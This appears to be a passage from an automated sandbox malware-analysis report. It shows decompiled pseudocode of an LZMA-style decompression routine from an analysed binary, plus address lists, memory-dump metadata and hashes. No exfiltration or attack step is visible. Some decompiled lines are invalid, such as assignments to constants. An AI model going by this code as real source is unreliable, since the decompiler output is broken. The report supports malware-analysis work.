														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                            0x00000000
                                            0x00406473
                                            0x00406473
                                            0x00406477
                                            0x00406498
                                            0x0040649f
                                            0x004064a5
                                            0x004064ab
                                            0x004064bd
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x00406479
                                            0x0040647f
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00406843
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00406891
                                            0x00406895
                                            0x00406a44
                                            0x00406a5a
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00406a72
                                            0x00406a76
                                            0x00406a76
                                            0x004068a1
                                            0x004068a8
                                            0x004068b0
                                            0x004068b3
                                            0x004068b6
                                            0x004068b6
                                            0x004068bc
                                            0x004068bc
                                            0x00406058
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061d4
                                            0x004061d6
                                            0x004061d9
                                            0x0040624a
                                            0x0040624d
                                            0x00406250
                                            0x00406257
                                            0x00406261
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x004061db
                                            0x004061df
                                            0x004061e2
                                            0x004061e4
                                            0x004061e7
                                            0x004061ea
                                            0x004061ec
                                            0x004061ef
                                            0x004061f1
                                            0x004061f6
                                            0x004061f9
                                            0x004061fc
                                            0x00406200
                                            0x00406207
                                            0x0040620a
                                            0x00406211
                                            0x00406215
                                            0x0040621d
                                            0x0040621d
                                            0x0040621d
                                            0x00406217
                                            0x00406217
                                            0x00406217
                                            0x0040620c
                                            0x0040620c
                                            0x0040620c
                                            0x00406221
                                            0x00406224
                                            0x00406242
                                            0x00406244
                                            0x00000000
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622c
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x00000000
                                            0x0040623d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x00406843
                                            0x00406840
                                            0x00000000
                                            0x00406477

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                            • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                            • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                            • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
